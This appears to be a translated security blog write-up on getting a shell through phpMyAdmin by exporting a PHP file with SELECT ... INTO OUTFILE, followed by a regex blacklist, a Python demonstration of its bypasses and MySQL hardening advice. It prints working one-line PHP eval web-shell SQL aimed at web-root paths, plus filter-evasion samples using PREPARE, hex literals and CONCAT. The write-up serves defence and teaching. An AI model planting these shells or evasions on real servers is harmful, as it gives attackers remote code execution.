Getshell Via phpmyadmin SQL Execution In /import.php To Writ
Contents
1. Vulnerability description 2. Trigger conditions 3. Affected versions 4. Code analysis 5. Defenses 6. Offense and defense reflections
1. Vulnerability description
phpMyAdmin is a PHP-based, web-based MySQL administration tool hosted on the web server that lets administrators manage MySQL databases through a browser. The web interface is a convenient way to enter complex SQL, and it is especially handy for importing and exporting large amounts of data. A further advantage is that, because phpMyAdmin runs on the web server like any other PHP program, the HTML pages it produces can be used from anywhere, i.e. MySQL can be administered remotely: creating, modifying and deleting databases and tables. phpMyAdmin can also be used to build commonly needed SQL and check its correctness while writing web pages.
2. Trigger conditions
1. The phpMyAdmin root password is known, i.e. the MySQL root password (phpMyAdmin is only a web front-end that connects to MySQL). Strictly, what the attack needs is an account holding the MySQL FILE privilege; root has it by default.
   1) MySQL's own default weak password
   2) the MySQL root password was obtained through another vulnerability (for example SQL injection)
2. The physical path of the website is known
   1) the "Variables" tab in the phpMyAdmin back end shows MySQL's physical paths (basedir, datadir), from which the website's physical path can be inferred
   2) the website's physical path was obtained through another web vulnerability
The core of getting a shell through phpMyAdmin is writing a file with SQL (SELECT ... INTO OUTFILE). Two common forms:

```sql
-- 1: stage the payload in a table, then export it to the web root
CREATE TABLE a (cmd text NOT NULL);
INSERT INTO a (cmd) VALUES ('<?php @eval($_POST[cmd])?>');
SELECT cmd FROM a INTO OUTFILE 'C:/htdocs/1.php';
DROP TABLE IF EXISTS `a`;

-- 2: single statement, no table needed
SELECT '<?php @eval($_POST[pass]);?>' INTO OUTFILE 'd:/wamp/www/exehack.php';
```
Relevant Link:
http://www.exehack.net/681.html
http://www.exehack.net/99.html
http://www.187299.com/archives/1695
3. Affected versions
All phpMyAdmin versions. This is not a bug in a particular release: SELECT ... INTO OUTFILE is legitimate MySQL syntax and phpMyAdmin simply passes the submitted SQL through to the server, so every version is usable for this as long as the MySQL account has the FILE privilege and the server's secure_file_priv setting allows writing to the target directory.
4. Code analysis
/phpMyAdmin/import.php
The logic that parses and executes user-submitted SQL (both the SQL tab and file import post to this script) is implemented in this PHP file:

```php
/* this code point is important: $import_text is the value that needs to be checked strictly */
if ($go_sql) {
    // parse sql query
    include_once 'libraries/parse_analyze.inc.php';

    if (isset($ajax_reload) && $ajax_reload['reload'] === true) {
        $response = PMA_Response::getInstance();
        $response->addJSON('ajax_reload', $ajax_reload);
    }

    // $import_text is handed to the executor unchanged
    PMA_executeQueryAndSendQueryResponse(
        $analyzed_sql_results, false, $db, $table, null, $import_text, null,
        $analyzed_sql_results['is_affected'], null, null, null, null, $goto,
        $pmaThemeImage, null, null, null, $sql_query, null, null
    );
} else if ($result) {
    // Save a Bookmark with more than one queries (if Bookmark label given).
    if (! empty($_POST['bkm_label']) && ! empty($import_text)) {
        PMA_storeTheQueryAsBookmark(
            $db, $GLOBALS['cfg']['Bookmark']['user'], $import_text,
            $_POST['bkm_label'],
            isset($_POST['bkm_replace']) ? $_POST['bkm_replace'] : null
        );
    }
    $response = PMA_Response::getInstance();
    $response->isSuccess(true);
    $response->addJSON('message', PMA_Message::success($msg));
    $response->addJSON('sql_query', PMA_Util::getMessage($msg, $sql_query, 'success'));
} else if ($result == false) {
    $response = PMA_Response::getInstance();
    $response->isSuccess(false);
    $response->addJSON('message', PMA_Message::error($msg));
} else {
    $active_page = $goto;
    include '' . $goto;
}
```
5. Defenses
Checking the variable $import_text for malicious content is the defensive idea against the "execute SQL, export a file, get a shell" attack through phpMyAdmin:

```php
// Blacklist check on the SQL text posted to import.php
// modifiers: s = dot also matches newline, i = case-insensitive, m = multiline
if (preg_match("/select.*into.*(outfile|dumpfile)/sim", $import_text, $matches)) {
    echo "request error! " . $matches[0];
    die();
}
```

Pay particular attention, when using PHP's regex engine, to bypasses through newlines: the s modifier above is what makes `.` match a newline, so a payload with SELECT on one line and INTO OUTFILE on another is still caught; without it the check is trivially bypassed.

Also note that MySQL has many extended syntaxes that let the attacker avoid writing the literal keywords in the request, for example:
1. defining stored procedures
2. defining functions
3. defining triggers
4. prepared statements:

```sql
PREPARE stmt FROM 'select count(*) from information_schema.schemata';
-- the SQL text to be compiled here can also be transformed at the character level
-- (hex literal, CONCAT of fragments, user variables) to bypass the filter
EXECUTE stmt;
```

A text filter in phpMyAdmin is therefore only a blacklist and should be treated as a secondary control. The reliable defenses are on the MySQL side: do not grant the FILE privilege to the account used through phpMyAdmin, set secure_file_priv to a directory outside the web root (or to NULL to disable file export entirely; an empty value means unrestricted), run mysqld under an account that cannot write to the web root, and do not expose phpMyAdmin with a weak or default root password.
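The following is an added example, not code from the original post or from phpMyAdmin. It transliterates the page's preg_match blacklist into Python, shows the two points made above (the s modifier and the prepared-statement obfuscations) against constructed SQL samples, and then applies a normalisation pass (strip comments, fold CONCAT of string literals, decode hex literals) before matching. The sample statements, file paths and the helper names are invented for the demonstration.

```python
import re

# The page's blacklist: preg_match("/select.*into.*(outfile|dumpfile)/sim", ...)
# PCRE s, i, m map to re.S, re.I, re.M.
PAGE_PATTERN = re.compile(r"select.*into.*(outfile|dumpfile)", re.S | re.I | re.M)
# Same pattern without the s modifier, to show why it matters.
NO_S_PATTERN = re.compile(r"select.*into.*(outfile|dumpfile)", re.I | re.M)


def page_filter_blocks(sql: str) -> bool:
    """True if the page's regex would reject this import text as-is."""
    return PAGE_PATTERN.search(sql) is not None


def filter_without_s_blocks(sql: str) -> bool:
    """Same check with '.' not matching newline."""
    return NO_S_PATTERN.search(sql) is not None


# Normalisation helpers: MySQL comments, hex string literals (0x...), and
# CONCAT() calls whose arguments are all plain single-quoted string literals.
COMMENT = re.compile(r"/\*.*?\*/|--[ \t][^\n]*|#[^\n]*", re.S)
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")
STRING_LITERAL = r"'(?:[^']|'')*'"
CONCAT_OF_LITERALS = re.compile(
    r"CONCAT\s*\(\s*((?:" + STRING_LITERAL + r"\s*,?\s*)+)\)", re.I
)


def normalize(sql: str) -> str:
    """Undo the obvious obfuscations before matching: strip comments,
    fold CONCAT('a','b') into 'ab', decode hex literals that are valid UTF-8."""
    sql = COMMENT.sub(" ", sql)

    def fold(m):
        parts = re.findall(STRING_LITERAL, m.group(1))
        inner = "".join(p[1:-1].replace("''", "'") for p in parts)
        return "'" + inner + "'"

    sql = CONCAT_OF_LITERALS.sub(fold, sql)

    def decode(m):
        try:
            return "'" + bytes.fromhex(m.group(1)).decode("utf-8") + "'"
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # not text, leave the literal untouched

    return HEX_LITERAL.sub(decode, sql)


def hardened_filter_blocks(sql: str) -> bool:
    """The page's blacklist applied after normalisation."""
    return page_filter_blocks(normalize(sql))


# Constructed samples (invented for this example, not from a real incident).
DIRECT = "select '<?php @eval($_POST[pass]);?>' INTO OUTFILE 'd:/wamp/www/exehack.php'"
MULTILINE = "select cmd\nfrom a\ninto\noutfile 'C:/htdocs/1.php'"
# Bypass 1: the whole statement as one hex literal handed to PREPARE.
HEX_PREPARE = "PREPARE s FROM 0x%s; EXECUTE s;" % DIRECT.encode().hex()
# Bypass 2: the OUTFILE keyword split across two literals and rebuilt by CONCAT
# (0x3c3f706870 is '<?php').
CONCAT_PREPARE = (
    "SET @q = CONCAT('select 0x3c3f706870 into out', 'file ''/var/www/html/x.php'''); "
    "PREPARE s FROM @q; EXECUTE s;"
)

if __name__ == "__main__":
    for name, sample in [("direct", DIRECT), ("multiline", MULTILINE),
                         ("hex+prepare", HEX_PREPARE), ("concat+prepare", CONCAT_PREPARE)]:
        print(f"{name:15} page filter: {page_filter_blocks(sample)!s:5} "
              f"after normalisation: {hardened_filter_blocks(sample)}")
```

Both prepared-statement variants pass the page's regex untouched and are only caught after normalisation, and the normaliser itself is still incomplete (fragments stored in separate user variables and joined with CONCAT(@a, @b) go through). That is the general problem with keyword blacklists on SQL text, and why the MySQL-side controls (no FILE privilege, secure_file_priv) are the ones to rely on.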
Relevant Link:
http://php.net/manual/en/function.preg-match.php#111573
http://blog.sina.com.cn/s/blog_3fe961ae01013r8f.html
6. Offense and defense reflections
Copyright (c) 2014 LittleHann All rights reserved